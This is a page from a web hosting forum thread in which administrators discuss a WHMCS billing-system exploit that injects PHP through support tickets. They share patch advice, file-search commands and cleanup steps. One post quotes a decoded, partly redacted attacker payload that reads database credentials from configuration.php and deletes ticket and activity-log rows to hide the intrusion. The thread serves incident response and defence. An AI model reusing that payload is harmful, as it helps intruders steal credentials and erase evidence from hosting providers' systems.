hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : WHMCS Attack through php eval - Is my WHMCS is hacked?
Reply

Forum Jump

WHMCS Attack through php eval - Is my WHMCS is hacked?

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #31  
Old
Web Hosting Master
 
Join Date: Feb 2003
Location: Cumbernauld, Scotland, UK
Posts: 720
Quote:
Originally Posted by cpoalmighty View Post
Isn't dl a standard WHMCS file?
What do we have to look for specifically?
Yes, dl.php is a WHMCS system file
Look at the date of the files on FTP
If they have the same date as the support ticket then you know it has been compromised

As I posted some time ago, the exploit assumes eval is ON
My solution was to turn eval OFF
Obviously if you need to use eval in php then you need to apply the patch

Equally, only my customers can submit support tickets
As a result this attacker had to register as a new customer first
Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!

__________________
M8 INTERNET : Simple and cost effective website hosting from the UK
M8 INTERNET : Google Ads Account Management

Sponsored Links
  #32  
Old
Web Hosting Master
 
Join Date: Mar 2009
Posts: 2,203
Quote:
Originally Posted by bear View Post
The solution appears to be to apply the patch and possibly block subjects that begin with that tag. If you have a mod_sec rule that defeats this, that should be no problem.
Hi,i use whm/cpanel and install whmcs on it,can i ask how do you use mod_sec rule to secure it more ? thanx

  #33  
Old
Actively learning French
 
Join Date: Apr 2009
Location: OnTheWeb
Posts: 2,006
Quote:
Originally Posted by m8internet View Post
Yes, dl.php is a WHMCS system file
Look at the date of the files on FTP
If they have the same date as the support ticket then you know it has been compromised

As I posted some time ago, the exploit assumes eval is ON
My solution was to turn eval OFF
Obviously if you need to use eval in php then you need to apply the patch

Equally, only my customers can submit support tickets
As a result this attacker had to register as a new customer first
Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!
Good detective work

I'm safe because I just double checked it (that means that the patch is working )

<<<snipped my content >>>

__________________
If you're the smartest person in the room then you're in the wrong room

Sponsored Links
  #34  
Old
Newbie
 
Join Date: Dec 2011
Posts: 20
This is really a great security issue is WHMCS rolled out any patch for it

Quote:
Originally Posted by DewlanceHosting View Post
I decode his code through base 64decoder..



$text=file_get_contents("configuration.php");
REMOVED.....
eval($text);

$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
REMOVED!!!!! so others will not use this...

  #35  
Old
Web Hosting Master
 
Join Date: Nov 2004
Location: Australia
Posts: 1,529
Quote:
Originally Posted by msam029 View Post
This is really a great security issue is WHMCS rolled out any patch for it
Weeks ago, don't tell me you haven't been paying attention to any of the MANY notices about it - on here, in WHMCS itself, on their site, in their forums ...

  #36  
Old
Securing the Dragon.
 
Join Date: Feb 2007
Location: Federal Heights, CO
Posts: 1,793
Just wanted to add some more info to this thread. Initial exploit attempts against us were trying to place a file called b0x.php in the following directories:
Code:
templates_c
images
A quick way to search for the known exploit files:
Code:
find / | grep b0x.php
find / | grep dl.php
find / | grep wh.php
find / | grep xfr.php
find / | grep sss.php
find / | grep ed8.php
find / | grep test.php
find / | grep red.php
Just a heads up.

__________________
-Joe @ Secure Dragon LLC.
+ OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
+ Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas


  #37  
Old
Web Hosting Master
 
Join Date: May 2009
Location: Area 51
Posts: 1,271
Thanks for the heads up Joe!

__________________
Zomex - We specialize in > web hosting templates < New responsive template!
We offer the best web hosting templates (WHMCS and/or Wordpress based!)
█ We also provide > WHMCS Configuration < Integration & web hosting business setup

  #38  
Old
Web Hosting Master
 
Join Date: May 2010
Posts: 655
The attackers keep trying to exploit our WHMCS, a couple of tickets a week. Unfortunately for them it was patched from day one of the exploit. I have had to disable them and allow they for clients only.

- Ashton

__________________
Ashton Allen | FuseWeb Limited
Premium UK Webhosting
| Shared Hosting | VPS | Reseller Hosting | VOIP |
FuseWeb.co.uk Or follow us on Twitter

  #39  
Old
Community Liaison
 
Join Date: Aug 2009
Location: 2607:FF68:100:11
Posts: 3,298
We get about 5 of these tickets a day. Patched it the day the email was received from WHMCS about it. It's most likely going to be an on-going issue (Receiving the emails meaning) for a couple of months until they realize all of the legitimate WHMCS setups have been patched.

  #40  
Old
Aspiring Evangelist
 
Join Date: Dec 2004
Posts: 414
Quote:
Originally Posted by almanox View Post
Disabling php tag has been one of the security features of smarty templates for years. Weird it created issues just now. I used to believe it was disabled in such serious projects as billing systems but seems like it was not at least in email/ticket parsing code.
I do not think the vulnerability is in the ticket code itself, but elsewhere.

A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.

So I assume the ticket facility is merely used as a way to get a file uploaded, that is later executed by using the vulnerability.

Be aware that there may be other ways for an attacker to get a file uploaded on your system (e.g. through another website hosted on the same webserver).
So people should not assume they are secure because they disabled their ticket system, or set it to "customers only"
Make sure you applied the patch instead.


BTW it seems WHMCS uses {php} in their own templates as well:

Code:
$ grep -R "{php}" *
orderforms/boxes/products.tpl:{php}
orderforms/boxes/configureproductdomain.tpl:www. <input type="text" name="sld[2]" size="40" value="{$sld}" /> . <input type="text" name="tld[2]" size="7" value="{php}
So disabling code execution in smarty, might break legitimate functionality.

__________________
Maxnet
Offering automated dedicated server provisioning software


  #41  
Old
Junior Guru Wannabe
 
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Alright, this is whats up.

Most of you have been getting these, and don't know what is happening.

First of all, run through all of your logs, check IP's of admins logged, and actions executed.

This exploit was around before the patch was even up, so most people have been compromised before they even patched it.

Patching this, doesn't mean you are now safe and secure. What I have been seeing mostly is that the hackers have exploited and injected a backdoor page. This page can be ANYWHERE on your website. It is a page that decrypts your admin password, and pretty much anything in your system.

The solutions:
EASIEST: Backup your database, and DELETE EVERYTHING from your public_html to make sure you delete the backdoor file that was injected. Then download the newest most stable release of WHMCS, and attach it to your DB. Make sure to change ALL PASSWORDS. That includes admin, sql passwords, sql username passwords, ect.. Also change your database name and username that connects to the database. This will make sure that the backdoors have been deleted and you are now up-to-date with new passwords, and all the patched files. Lastly, if you have regular index.php files on your web server that is not attached to WHMCS, look through those files carefully for any of the possible injected code.


The second option is just much more painful. This would include looking through every single file in your system and every single folder to find any compromised files.

Hope this helps.

  #42  
Old
Community Leader
 
Join Date: Oct 2002
Location: Mayberry
Posts: 19,951
Quote:
Originally Posted by Maxnet View Post
A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.
That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.
Quote:
Originally Posted by djeuro View Post
This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
Hard to patch before the exploit was found.

__________________
Having problems, or maybe questions about WHT? Head over to the help desk!



  #43  
Old
Junior Guru Wannabe
 
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Quote:
Originally Posted by bear View Post
That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.

Hard to patch before the exploit was found.
Well yes it's hard to patch it before exploit is found, that's why I just explained the steps to take now instead of saying people should have found it before the actual patch.

  #44  
Old
Web Hosting Master
 
Join Date: Nov 2004
Location: Australia
Posts: 1,529
Quote:
Originally Posted by djeuro View Post
This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
Thanks for your post.

Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.

  #45  
Old
Junior Guru Wannabe
 
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Quote:
Originally Posted by brianoz View Post
Thanks for your post.

Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.
I am actually more than willing to share the whole script with you guys since one of my sites were injected with this. The more we can see about it, the more we can patch.

Contact me over PM.

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
WHMCS INTEGRATION - WHMCS UPGRADE - WHMCS INSTALLL - WHMCS CONFIGURATION <-- HOT!!! Dustin Cisneros Design Offers 3 12-27-2011 10:32 PM
WHMCS Integration - WHMCS Services- WHMCS Install - WHMCS Upgrade- WHMCSconfiguration Dustin Cisneros Design Offers 0 11-12-2010 08:26 PM
WHMCS INTEGRATION - WHMCS SERVICES - WHMCS CONFIGURATION - WHMCS INSTALL/UPGRADE Dustin Cisneros Design Offers 3 10-28-2010 01:15 PM
WHMCS INTEGRATION -WHMCS SERVICES -WHMCS UPGRADE - WHMCS CONFIGURATION -SemoWeb Dustin Cisneros Design Offers 1 09-20-2010 03:40 PM
WHMCS Integration - WHMCS Services - WHMCS Upgrade - WHMCS Configuration -WHMCS Dustin Cisneros Design Offers 0 09-12-2010 02:50 AM

Related posts from TheWhir.com
Title Type Date Posted
WHMCS Encourages Users to Upgrade as Part of Important Security Update Web Hosting News 2014-08-27 12:05:55
OnApp Releases New WHMCS Module for Service Providers Web Hosting News 2014-01-21 14:04:13
WHMCS Security Issue Allows for Information Disclosure Web Hosting News 2013-10-25 09:30:46
WHMCS Releases Patch to Address Critical Security Issue Web Hosting News 2013-10-04 16:12:43
GCHQ, Not NSA, Behind Belgian Telecom Attack: Report Web Hosting News 2014-05-01 08:22:23


Tags
whmcs release beta version 5.x

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
WHT Host Brief Email:

We respect your privacy. We will never sell, rent, or give away your address to any outside party, ever.

Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?